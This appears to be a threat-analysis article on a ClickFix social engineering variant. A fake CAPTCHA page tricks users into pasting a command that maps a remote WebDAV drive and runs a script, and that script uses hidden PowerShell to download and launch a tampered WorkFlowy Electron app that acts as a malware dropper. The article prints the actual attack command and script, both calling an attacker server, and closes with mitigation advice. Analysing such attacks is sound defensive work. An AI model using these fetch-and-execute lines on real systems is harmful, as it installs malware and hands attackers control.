Unveiling a New ClickFix Variant: Cyberattackers Exploit Network Drives and Electron Apps
Cybersecurity researchers have recently identified a sophisticated evolution of the ClickFix social engineering technique, marking a significant advancement in cyberattack methodologies. This new variant manipulates users into executing malicious commands that map external network drives and deploy compromised Electron-based applications, thereby facilitating unauthorized access and control over targeted systems.
Understanding ClickFix and Its Evolution
ClickFix is a deceptive tactic where attackers trick users into running harmful commands under the guise of resolving non-existent issues or completing routine tasks. Traditionally, this involved prompting users to execute commands via the Windows Run dialog, leading to the download and execution of malicious scripts. The latest iteration of ClickFix introduces more complex techniques, enhancing the attack’s effectiveness and evasion capabilities.
Detailed Attack Flow
The attack initiates when a user visits a compromised or malicious website designed to resemble a legitimate CAPTCHA verification page. The site instructs the user to press the Win + R keyboard shortcut to open the Run dialog, paste a provided command, and execute it by pressing Enter. The command executed is as follows:
“`
cmd.exe /c net use Z: https://94.156.170[.]255/webdav /persistent:no && Z:\update.cmd & net use Z: /delete
“`
This command sequence performs the following actions:
1. Network Drive Mapping: Utilizes the `net use` command to map a network drive (designated as Z:) to an external server located at `https://94.156.170[.]255/webdav`. The `/persistent:no` flag ensures that the mapping is temporary and will not persist after a system reboot.
2. Execution of Malicious Script: Once the network drive is mapped, the command executes a batch script named `update.cmd` located on the mapped drive.
3. Cleanup: After executing the script, the network drive mapping is removed using `net use Z: /delete` to minimize traces of the attack.
Analysis of the Malicious Script
The `update.cmd` script contains the following instructions:
“`
start /min powershell -WindowStyle Hidden -Command Invoke-WebRequest ‘https://94.156.170[.]255/flowy.zip’ -OutFile \$env:TEMP\dl.zip\;
Expand-Archive \$env:TEMP\dl.zip\ -DestinationPath \$env:LOCALAPPDATA\MyApp\ -Force;
Start-Process \$env:LOCALAPPDATA\MyApp\WorkFlowy.exe\
“`
This script performs the following operations:
1. Download of Malicious Archive: Initiates a hidden PowerShell process that downloads a ZIP archive named `flowy.zip` from the external server `https://94.156.170[.]255/flowy.zip` and saves it to the system’s temporary directory.
2. Extraction and Deployment: Extracts the contents of the ZIP archive into the directory `%LOCALAPPDATA%\MyApp\`.
3. Execution of Compromised Application: Launches an application named `WorkFlowy.exe` from the extracted files.
Exploitation of Electron Applications
The `flowy.zip` archive contains a modified version of the WorkFlowy desktop application (version 1.4.1050), an Electron-based application signed by FunRoutine Inc. Electron applications are built using web technologies and package their source code into `.asar` archives.
In this attack, the `.asar` archive within the WorkFlowy application has been tampered with to include malicious code. When the user launches the compromised WorkFlowy application, the embedded malicious code executes, establishing a command-and-control (C2) beacon and acting as a dropper for additional malware payloads.
Implications and Evasion Techniques
This new ClickFix variant demonstrates a high level of operational sophistication:
– Bypassing Security Measures: By leveraging legitimate system utilities like `net use` and PowerShell, the attack evades detection by security solutions that monitor for traditional malware signatures.
– Utilizing Trusted Applications: The use of a legitimate, signed Electron application reduces suspicion and increases the likelihood of successful execution.
– In-Memory Execution: Executing malicious code within the memory space of a trusted application minimizes the presence of malicious files on disk, further evading detection.
Recommendations for Mitigation
To protect against such sophisticated attacks, users and organizations should implement the following measures:
1. User Education: Train users to recognize and avoid social engineering tactics, such as unexpected prompts to execute commands or open files from untrusted sources.
2. Restrict Execution Policies: Implement strict execution policies that prevent unauthorized scripts and commands from running, especially those initiated through the Run dialog or command prompt.
3. Monitor Network Activity: Regularly monitor network activity for unusual patterns, such as unexpected network drive mappings or connections to unfamiliar external servers.
4. Application Whitelisting: Utilize application whitelisting to control which applications are allowed to run, thereby preventing the execution of unauthorized or modified applications.
5. Regular Software Updates: Ensure that all software, including security solutions, is up to date to benefit from the latest security patches and threat intelligence.
Conclusion
The emergence of this new ClickFix variant underscores the evolving nature of cyber threats and the importance of continuous vigilance. By understanding the tactics employed in such attacks and implementing robust security measures, individuals and organizations can better defend against these sophisticated social engineering schemes.
